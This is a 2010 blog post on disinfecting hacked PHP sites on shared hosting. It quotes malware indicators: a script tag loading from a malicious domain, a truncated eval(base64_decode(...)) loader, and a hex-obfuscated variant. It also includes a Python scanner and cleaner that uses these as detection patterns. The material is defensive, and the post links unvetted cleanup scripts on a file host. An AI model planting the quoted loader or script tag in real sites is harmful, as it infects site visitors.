Unfortunately, a fellow blogger and I were caught up in this attack, not on this site but on a couple of others under another account. The first thing you will notice if you are infected is that when you go to a page on your site, a malicious JavaScript snippet will try to redirect you and load the malware from:
<script src="http://myblindstudioinfoonline.com/ll.php"
That tag is injected by this code, which is added to the top of all or many of your .php files:
eval(base64_decode("aWYoZnVuY3Rpb....
Many WordPress, Drupal and Joomla sites, as well as other CMS and PHP-driven sites, could be affected by this, so watch out. Luckily it is not a huge deal to disinfect your files, thanks to the people at http://blog.sucuri.net/2010/09/godaddy-sites-hacked-myblindstudioinfoonline-com-and-hilary-kneber.html for the information posted earlier today and
http://www.blogtips.org/godaddy-hacked-again-another-way-to-cure/ for the easy-to-follow instructions. In case you want the details right now, here is the meat of it.
The script will not only work for GoDaddy + WordPress, but for any .php-based site (I used it this morning to cure a Drupal site) on any host.
Here are the right steps to follow:
- Make sure you back up your site, just to make sure. There are many tools to do so, but a “brute force” copy of your entire blog directory to your local computer using an FTP tool like FileZilla works fine.
- Download this zip file. It contains a file called “fixfiles.php”. Extract it and store it on your computer. (Ok, no zip file? Here is the fixfilesphp.txt version. Save it as fixfiles.php.)
- FTP the “fixfiles.php” file to the root directory of your blog. In GoDaddy, that is the /HTML directory (which also contains index.php, wp-login.php etc.).
- If you only want to clean a subdirectory (and its underlying tree), put the file in that subdirectory, but remember that the command in the next step will have to reflect that.
- Then execute the code by opening this URL:
http://yoursite.com/fixfiles.php
(or http://yoursite.com/subdir/fixfiles.php if you put it in a subdirectory)
- The code will first scan for the malware code in your files, in both the directory it is put in and all underlying directories.
If you get the message: 0 Infected Files in ./
…then your site is clean.
If any malware is found, the script will list the infected files and prompt you to fix them: click on “Fix Files”, then click OK on the prompt to proceed.
- The script will scan through all files again, and clean the malware. It will list all files that were cleaned.
- Delete the “fixfiles.php” file from your site after execution.
- If you are using a caching plug-in, don’t forget to CLEAR YOUR CACHE, otherwise the malware will continue to be served to your users even though you cleaned your .php code.
All of that is “curing” the problem. I have looked everywhere, but have yet to find a way to “avoid” the infection. It looks like the hackers found a loophole in Linux shared hosts (and not just those on GoDaddy), which the hosting companies have been unable to identify and/or close.
Until such time, scan your sites every day, and cure the problem immediately before your visitors get infected.
Picture courtesy Owning Pink
October 31, 2010 UPDATE – Shared hosting on GoDaddy is again hit by hackers. This time the offending first line in all your .php files begins with: <?php /**/ $_8b7b="\x63\x72\x65\x61\x74\x65
Here is a link to a modified blog-cleaner.php that will take care of this exploit exactly as the last one did:
http://www.mediafire.com/?922k0m8ml1cawug
FTP the file to the root of your compromised website and open http://yourblog/blog-cleaner-new.php in your browser.
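If you would rather check the local backup you made in step one before touching the live site, here is an added example (my own code, not the fixfiles.php or blog-cleaner.php scripts linked above) that does the same job offline: it walks a directory tree, flags files carrying the three indicators quoted in this post (the base64 eval prefix, the 31 October $_8b7b variant, and the ll.php script tag that lingers in cached HTML), and strips the injected first-line block, refusing to write back any file where an indicator survives. The sample files and the payload text are constructed for the demo and are not the real malware.

```python
import re
import tempfile
from pathlib import Path

# Indicators quoted in the post: the base64 eval prefix, the 31 October variant
# (\x63\x72\x65\x61\x74\x65 spells "create") and the injected script tag (cached HTML).
INDICATORS = {
    "eval-base64": re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']aWYoZnVuY3Rpb'),
    "hex-create": re.compile(r'\$_8b7b\s*=\s*["\']\\x63\\x72\\x65\\x61\\x74\\x65'),
    "script-src": re.compile(r'myblindstudioinfoonline\.com/ll\.php'),
}
PHP_BLOCK = re.compile(r'<\?php.*?\?>')  # one complete <?php ... ?> block on a line

def find_indicators(text):
    """Names of every indicator present in text (empty list means clean)."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_tree(root, suffixes=(".php", ".html", ".htm")):
    """Recursively map each infected file under root to the indicators it carries."""
    files = (p for p in Path(root).rglob("*") if p.is_file() and p.suffix.lower() in suffixes)
    found = {str(p.relative_to(root)): find_indicators(p.read_text(errors="replace")) for p in files}
    return {rel: names for rel, names in found.items() if names}

def clean_php(text):
    """Drop prepended <?php ... ?> blocks on line 1 that carry an indicator.
    Returns (cleaned_text, is_clean); is_clean is False when an indicator survives
    (e.g. an injected block with no closing ?>), so that file needs manual review."""
    first, sep, rest = text.partition("\n")
    first = PHP_BLOCK.sub(lambda m: "" if find_indicators(m.group(0)) else m.group(0), first)
    cleaned = first + sep + rest if first else rest
    return cleaned, not find_indicators(cleaned)

# Constructed samples: stand-in payloads shaped like the quoted prefixes, not real malware.
ORIGINAL = '<?php\n// original site code\necho "hello";\n'
INFECTED_EVAL = '<?php /**/eval(base64_decode("aWYoZnVuY3Rpb24oKSl7fQ=="));?>' + ORIGINAL
INFECTED_HEX = '<?php /**/ $_8b7b="\\x63\\x72\\x65\\x61\\x74\\x65"; ?>' + ORIGINAL

def demo():
    """Write the samples into a throwaway tree, scan, clean what is safe to clean, rescan."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_text(INFECTED_EVAL)
        Path(root, "wp-content").mkdir()
        Path(root, "wp-content", "x.php").write_text(INFECTED_HEX)
        Path(root, "clean.php").write_text(ORIGINAL)
        before = scan_tree(root)
        for rel in before:
            cleaned, ok = clean_php(Path(root, rel).read_text())
            if ok:  # only write back when nothing survives the cleanup
                Path(root, rel).write_text(cleaned)
        return before, scan_tree(root)
```

Point scan_tree at the backup directory first; any file the cleaner reports as not clean (an injected block that does not end in ?>) should be opened and inspected by hand rather than trusted to the automatic strip.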
Thanks to Dougie Fresh from http://pics4twitts.com for noticing the problem, and thanks to the people above for the original solution.